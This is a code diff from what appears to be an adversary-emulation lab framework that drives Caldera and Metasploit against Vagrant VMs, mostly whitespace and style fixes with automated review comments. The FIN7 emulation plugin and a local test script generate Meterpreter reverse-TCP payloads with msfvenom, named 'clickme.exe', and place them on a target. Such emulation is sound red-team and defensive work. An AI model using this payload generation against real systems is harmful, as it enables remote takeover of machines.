diff --git a/app/calderacontrol.py b/app/calderacontrol.py
index 062191b..1e57c0e 100644
--- a/app/calderacontrol.py
+++ b/app/calderacontrol.py
@@ -587,7 +587,7 @@ class CalderaControl():
 # ######## All inclusive methods
- def attack(self, attack_logger: AttackLog = None, paw="kickme", ability_id="bd527b63-9f9e-46e0-9816-b8434d2b8989", group="red", target_platform=None, parameters = None):
+ def attack(self, attack_logger: AttackLog = None, paw="kickme", ability_id="bd527b63-9f9e-46e0-9816-b8434d2b8989", group="red", target_platform=None, parameters=None):
 """ Attacks a system and returns results
 @param attack_logger: An attack logger class to log attacks with
@@ -689,7 +689,7 @@ class CalderaControl():
 self.attack_logger.vprint(f"{CommandlineColors.BACKGROUND_GREEN} Output: {outp} {CommandlineColors.ENDC}", 2)
 pprint(output)
- self.attack_logger.vprint(self.list_facts_for_name("source_"+operation_name), 2)
+ self.attack_logger.vprint(self.list_facts_for_name("source_" + operation_name), 2)
 # ######## Cleanup
 self.execute_operation(opid, "cleanup")
diff --git a/app/config.py b/app/config.py
index 168d972..e8151a5 100644
--- a/app/config.py
+++ b/app/config.py
@@ -204,7 +204,7 @@ class ExperimentConfig():
 try:
 res = self.raw_config["kali_conf"][attack]
- except KeyError as exception:
+ except KeyError:
 res = {}
 if res is None: res = {}
diff --git a/app/experimentcontrol.py b/app/experimentcontrol.py
index 5f7bf11..1f785ea 100644
--- a/app/experimentcontrol.py
+++ b/app/experimentcontrol.py
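Review bot: The narrowed `except KeyError:` in the new code still does not cover the case where `self.raw_config["kali_conf"]` is present but empty — if raw_config is loaded from YAML, an empty `kali_conf:` section presumably arrives as None, and `None[attack]` raises TypeError, which escapes this handler; `except (KeyError, TypeError):` would keep the `{}` fallback for that shape as well. The `if res is None` check on the following line already handles an attack entry that is present but empty, so together the two guards would make every "missing or empty" shape return `{}`. The enclosing method starts and ends outside the hunk, so I cannot see whether a caller relies on the TypeError propagating.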
@@ -119,11 +119,11 @@ class Experiment():
 self.attack_logger.vprint(f"Attacking machine with PAW: {target_1.get_paw()} with {attack}", 2)
 it_worked = self.caldera_control.attack(attack_logger=self.attack_logger,
- paw=target_1.get_paw(),
- ability_id=attack,
- group=target_1.get_group(),
- target_platform=target_1.get_os()
- )
+ paw=target_1.get_paw(),
+ ability_id=attack,
+ group=target_1.get_group(),
+ target_platform=target_1.get_os()
+ )
 # Moved to fix section below. If fix works: can be removed
 # print(f"Pausing before next attack (config: nap_time): {self.experiment_config.get_nap_time()}")
diff --git a/app/metasploit.py b/app/metasploit.py
index a468868..af98e10 100644
--- a/app/metasploit.py
+++ b/app/metasploit.py
@@ -3,8 +3,6 @@ from pymetasploit3.msfrpc import MsfRpcClient
 from app.machinecontrol import Machine
-
-
 # https://github.com/DanMcInerney/pymetasploit3
 # Requirements
@@ -80,8 +78,6 @@ class MSFVenom():
 if outfile is not None: cmd += f" -o {outfile}"
-
-
 # -p payload linux/x86/meterpreter_reverse_tcp
 # -f format: elf, exe, powershell, python
 # --platform: linux, windows, osx
@@ -120,4 +116,3 @@ class MSFVenom():
 cmd = self.generate_cmd(**kwargs)
 self.attacker.remote_run(cmd)
-
diff --git a/caldera_control.py b/caldera_control.py
index 8dab345..fd9474a 100644
--- a/caldera_control.py
+++ b/caldera_control.py
@@ -31,7 +31,6 @@ def list_facts(calcontrol, arguments): # pylint: disable=unused-argument
 @param arguments: Parser command line arguments """
-
 printme = "No found"
 if arguments.name:
diff --git a/metasploit_control.py b/metasploit_control.py
index 9828903..7a41ee5 100644
--- a/metasploit_control.py
+++ b/metasploit_control.py
@@ -4,8 +4,7 @@ from app.metasploit import MSFVenom, Metasploit
 # For some local tests
-if __name__=="__main__":
-
+if __name__ == "__main__":
 # msfrpcd -S -P password -u user -f
 attacker_ip = "192.168.178.125"
@@ -17,16 +16,6 @@ if __name__=="__main__":
 attack_logger = AttackLog(0)
 attacker = Machine({"root": "systems/attacker1",
- "os": "linux",
- "vm_controller": {
- "type": "vagrant",
- "vagrantfilepath": "systems",
- "ip": attacker_ip
- },
- "vm_name": "attacker1"}, attack_logger)
-
- # Target machine is attacker machine here
- target = Machine({"root": "systems/attacker1",
 "os": "linux",
 "vm_controller": {
 "type": "vagrant",
@@ -35,6 +24,16 @@ if __name__=="__main__":
 },
 "vm_name": "attacker1"}, attack_logger)
+ # Target machine is attacker machine here
+ target = Machine({"root": "systems/attacker1",
+ "os": "linux",
+ "vm_controller": {
+ "type": "vagrant",
+ "vagrantfilepath": "systems",
+ "ip": attacker_ip
+ },
+ "vm_name": "attacker1"}, attack_logger)
+
 venom = MSFVenom(attacker, target)
 print(venom.generate_cmd(payload="linux/x64/meterpreter_reverse_tcp",
 architecture="x64",
@@ -44,4 +43,4 @@ if __name__=="__main__":
 outfile="clickme.exe"))
 metasploit = Metasploit(password, server=attacker.get_ip(), username=user)
- # client = MsfRpcClient('yourpassword', ssl=True)
\ No newline at end of file
+ # client = MsfRpcClient('yourpassword', ssl=True)
diff --git a/plugins/base/machinery.py b/plugins/base/machinery.py
index 66716f5..060ab25 100644
--- a/plugins/base/machinery.py
+++ b/plugins/base/machinery.py
@@ -125,11 +125,11 @@ class MachineryPlugin(BasePlugin):
 """ The path external to the vm where specific data is stored """
 return os.path.join(self.config.vagrantfilepath(), self.config.machinepath())
- ###############
 # This is the interface from the main code to the plugin system. Do not touch
 def __call_halt__(self):
 """ Wrapper around halt """
+ self.vprint(f"{CommandlineColors.OKBLUE}Stopping machine: {self.config.vmname()} {CommandlineColors.ENDC}", 1)
 self.halt()
 self.vprint(f"{CommandlineColors.OKGREEN}Machine stopped: {self.config.vmname()}{CommandlineColors.ENDC}", 1)
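Review bot: The ten added lines for `target` in the `@@ -35,6 +24,16 @@` hunk of metasploit_control.py repeat the `attacker` machine dict verbatim, so the two definitions will drift the next time one of them is edited; since the comment already says the target is the attacker machine, build the dict once, e.g. `machine_conf = {"root": "systems/attacker1", "os": "linux", "vm_controller": {...}, "vm_name": "attacker1"}` and then `attacker = Machine(machine_conf, attack_logger)` / `target = Machine(dict(machine_conf), attack_logger)`. Whether Machine keeps a reference to the dict it receives is not visible here; the `dict(...)` copy is only needed if it does and later mutates it. The `if __name__ == "__main__":` block these lines belong to starts before the hunk and continues after it.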
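Review bot: The new 'Stopping machine' message in `__call_halt__` (plugins/base/machinery.py) puts a space between the VM name and `{CommandlineColors.ENDC}` while the existing 'Machine stopped' line two lines below does not, so the two lines render with different trailing padding inside the colored span; `self.vprint(f"{CommandlineColors.OKBLUE}Stopping machine: {self.config.vmname()}{CommandlineColors.ENDC}", 1)` keeps them consistent. Since the wrapper now logs on both sides of the plugin call, its docstring could say so: `""" Wrapper around halt: logs before and after calling the plugin's halt() """`. If `self.halt()` raises, only the 'Stopping' line will have been printed, which looks intentional for a wrapper that does not catch, but is worth a short comment.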
diff --git a/plugins/default/adversary_emulations/FIN7/fin7_section1.py b/plugins/default/adversary_emulations/FIN7/fin7_section1.py
index 24b454f..96d39c3 100644
--- a/plugins/default/adversary_emulations/FIN7/fin7_section1.py
+++ b/plugins/default/adversary_emulations/FIN7/fin7_section1.py
@@ -8,7 +8,6 @@ from app.metasploit import MSFVenom
 import os
-
 class FIN7Plugin(AttackPlugin):
 # Boilerplate
@@ -34,7 +33,6 @@ class FIN7Plugin(AttackPlugin):
 # winword.exe spawns verclsid.exe
 # mshta uses taskschd.dll to create a task in 5 minutes
- self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}End Step 1: Initial Breach{CommandlineColors.ENDC}", 1)
 def step2(self):
@@ -70,7 +68,7 @@ class FIN7Plugin(AttackPlugin):
 # TODO: query computername https://attack.mitre.org/techniques/T1082/
 # self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}query COMPUTERNAME env{CommandlineColors.ENDC}", 1)
- #self.caldera_attack(self.targets[0], "c0da588f-79f0-4263-8998-7496b1a40596")
+ # self.caldera_attack(self.targets[0], "c0da588f-79f0-4263-8998-7496b1a40596")
 # TODO: load adsldp.dll and call dllGetClassObject() for the Windows Script Host ADSystemInfo Object COM object https://attack.mitre.org/techniques/T1082/
 # WMI query for System Network Configuration discovery https://attack.mitre.org/techniques/T1016/
@@ -100,12 +98,12 @@ class FIN7Plugin(AttackPlugin):
 payload_name = "clickme.exe"
 venom = MSFVenom(self.attacker_machine_plugin, self.targets[0])
- venom.generate_payload(payload="linux/x64/meterpreter_reverse_tcp",
- architecture="x64",
- platform="linux",
- # lhost,
- format="elf",
- outfile=payload_name)
+ venom.generate_payload(payload="windows/x64/meterpreter_reverse_tcp",
+ architecture="x64",
+ platform="windows",
+ # lhost,
+ format="exe",
+ outfile=payload_name)
 self.attacker_machine_plugin.get(payload_name, self.targets[0].get_machine_path_external())
 src = os.path.join(self.targets[0].get_machine_path_external(), payload_name)
 self.targets[0].put(src, self.targets[0].get_playground())
diff --git a/tests/test_calderacontrol.py b/tests/test_calderacontrol.py
index c9c884e..6ed03b8 100644
--- a/tests/test_calderacontrol.py
+++ b/tests/test_calderacontrol.py
@@ -273,18 +273,18 @@ class TestExample(unittest.TestCase):
 "name": "source_name"
 }
 exp3 = {"index": "operations",
- "name": name,
- "state": state,
- "autonomous": 1,
- 'obfuscator': 'plain-text',
- 'auto_close': '1',
- 'jitter': '4/8',
- 'source': 'source_test_name',
- 'visibility': '50',
- "group": group,
- "planner": "atomic",
- "adversary_id": advid,
- }
+ "name": name,
+ "state": state,
+ "autonomous": 1,
+ 'obfuscator': 'plain-text',
+ 'auto_close': '1',
+ 'jitter': '4/8',
+ 'source': 'source_test_name',
+ 'visibility': '50',
+ "group": group,
+ "planner": "atomic",
+ "adversary_id": advid,
+ }
 with patch.object(self.cc, "__contact_server__", return_value=None) as mock_method:
 self.cc.add_operation(name, advid, group, state)
 # mock_method.assert_called_once_with(exp, method="put")
@@ -300,7 +300,7 @@ class TestExample(unittest.TestCase):
 "rules": [],
 "relationships": [],
 "facts": []
- }
+ }
 exp2 = {"index": "sources",
 "name": "source_name"
 }
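Review bot: `self.targets[0]` is dereferenced four times across the rewritten `generate_payload` call in fin7_section1.py and the three context lines that follow it; binding it once, `target = self.targets[0]`, and using `target` in the `MSFVenom(...)`, `.get(...)`, `os.path.join(...)` and `.put(...)` calls would make the block easier to read and removes the repeated index. The `format="exe"` argument and the hard-coded `payload_name = "clickme.exe"` now agree, but they are set independently several lines apart, so a later change to one can silently desynchronise the other; deriving the name from the format, or a comment stating that the two must match, would make that coupling explicit. The enclosing method starts before the hunk and continues after it.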